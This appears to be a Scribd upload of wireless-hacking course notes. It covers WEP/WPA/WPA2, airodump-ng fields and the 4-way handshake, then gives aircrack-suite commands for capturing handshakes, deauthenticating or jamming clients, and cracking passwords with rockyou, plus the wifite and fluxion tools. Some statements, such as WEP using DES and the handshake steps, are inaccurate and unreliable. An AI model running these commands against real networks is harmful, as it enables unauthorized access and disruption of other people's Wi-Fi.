0% found this document useful (0 votes)
6 views3 pages

m16 Wireless Hacking

A wireless network enables communication between devices without physical cables, utilizing access points for connectivity. Security protocols like WEP, WPA, and WPA2 provide varying levels of protection, with WPA2 offering the strongest encryption through AES. Various commands and tools are available for monitoring and managing wireless networks, including capturing packets and performing network attacks.

Uploaded by

hihim31592
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
6 views3 pages

m16 Wireless Hacking

A wireless network enables communication between devices without physical cables, utilizing access points for connectivity. Security protocols like WEP, WPA, and WPA2 provide varying levels of protection, with WPA2 offering the strongest encryption through AES. Various commands and tools are available for monitoring and managing wireless networks, including capturing packets and performing network attacks.

Uploaded by

hihim31592
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

wireless network :- A wireless network is a computer network that utilizes wireless

data connections between network nodes, enabling communication without the need for
physical cables.

Access point (ap) : it is a hardware device that allows wireless connectivity to


the end devices.

wifi : Wi-Fi, short for Wireless Fidelity, is a technology that enables devices to
connect and communicate wirelessly over a local area network (LAN) or the internet.

IEEE : The IEEE (Institute of Electrical and Electronics Engineers) is a


professional organization that develops and publishes standards for various
industries, ensuring consistency and interoperability among different technologies

Different security protocols used in wireless networks:

Wired Equivalent Privacy (WEP) - 1997


- Designed to provide the same level of security as that of a wired LAN.
- WEP is Standard protocol before 2004.
- Uses Pre-shared Key .
- used rc4 algorithm and DES encryption.

Wi-Fi Protected Access (WPA) - 2003 by Wi-Fi Alliance :


- Used for WLAN network based on 802.11i
- It was developed in response to the weaknesses of WEP, and therefore improves on
WEP's authentication and encryption features.
- WPA make it more secure by adding extra security mechanism and algorithms to stop
unauthorized access.
- WPA delivers a level of security way beyond anything that WEP can offer.
- WPA uses the Temporal Key Integrity Protocol (TKIP) for encryption, which is an
improvement over WEP but still has vulnerabilities.

WPA2 - 2004 :
- It is Introduced as the successor to WPA,
WPA2 is based on the final version of the 802.11i standard,
providing stronger security features and improved encryption algorithms.
- WPA2 supports larger key sizes compared to WPA, utilizing the AES (Advanced
Encryption Standard) encryption algorithm with key lengths of 128, 192, or 256
bits.
- it uses CCMP, which is a security protocol used to encrypt data transmitted over
Wi-Fi networks, It employs the Advanced Encryption Standard (AES) with a 128-bit
key length for encryption, which is highly secure and resistant to cryptographic
attacks.

-----------------------------------------------------------------------------------
----------------------

wireless adaptor : A Wi-Fi adapter is a hardware device that enables devices to


connect to Wi-Fi networks.

Modes of Using a Wireless Adapter :

- Standard Mode | Managed Mode : Which every person use to access and use the
services of a particular Access Point.
- Monitoring Mode : The mode which allows a computer with a wireless network
interface controller to monitor all traffic received from the wireless networks.

-------------------------------------------------

ESSID : The name of the AP.


BSSID : MAC Address of the Access Point.
PWR : The lower the number the nearest the wifi.
Beacons : Number of beacons sent by the AP. Each access point sends about ten
beacons per second at the lowest rate, so they can usually be picked up from very
far
#Data : Number of captured data packets including data broadcast packets.
#s : Number of data packets per second measure over the last 10 seconds.
CH : Channel number (taken from beacon packets). Note: sometimes packets from other
channels are captured even if airodump-ng is not hopping, because
of radio interference.
MB : Maximum speed supported by the AP. The dot (after 54 above) indicates short
preamble is supported. 'e' indicates that the network has QoS (802.11e) enabled.
ENC : Encryption methods in use(wep,wpa,wpa2).
CIPHER : The cipher detected. One of CCMP, TKIP . TKIP is typically used with WPA
and CCMP is typically used with WPA2.
AUTH : The authentication protocol used . (Eg. psk)
------------------------------------------

4 way handshake:

1. Request: The device asks to join the Wi-Fi network.


2. Response: The Wi-Fi router replies with a random number and some network
details.
3. Client's Confirmation: The device sends back its own random number and a secret
code to prove it's legit.
4. Access Point's Confirmation: The Wi-Fi router checks the device's info and if
everything matches, it says, "You're in!"

Practical :

Commands :
#ifconfig - For checking if our wifi is connected
#iwconfig - For checking if our wifi has managed mode or monitor mode
#airmon-ng start wlan0 - For starting monitoring mode on wlan0
#iwconfig - For checking our updated name of wifi interface - wlan0mon

#airodump-ng wlan0mon - For capturing all packets and monitoring the wireless
devices.

#airodump-ng --bssid 7E:A9:6B:50:49:50 -c 3 -w /root/Desktop/wififile wlan0mon - It


will show all the devices mac address which are connected with that wifi ap.

(( airodump-ng --bssid 5E:E2:F7:C2:91:F3 -c 12 -w /home/dev010/Desktop/XYZ wlan0 ))

#aireplay-ng -0 0 -a 83:H8:92:N2:23:52(Router's Mac address) -c


BB:H7:K7:HN:86:29(Device mac address which we want to disconnect) wlan0mon
(( aireplay-ng -0 0 -a 5E:E2:F7:C2:91:F3 -c 76:EB:AE:CA:48:B3 wlan0
))
#aircrack-ng /root/Downloads/wififile-01.cap -w /usr/share/wordlists/rockyou.txt -
For cracking the password.

wifi jamming
#aireplay-ng -0 0 -a 9V:8H:DE:48:U8:39 wlan0mon - For jamming the full wifi.
---------------------------------------------------------------------------
we can use fluxion or wifite tool. They both are automation tool they will do
everything on their own.
wifite :
#wifite --wpa

You might also like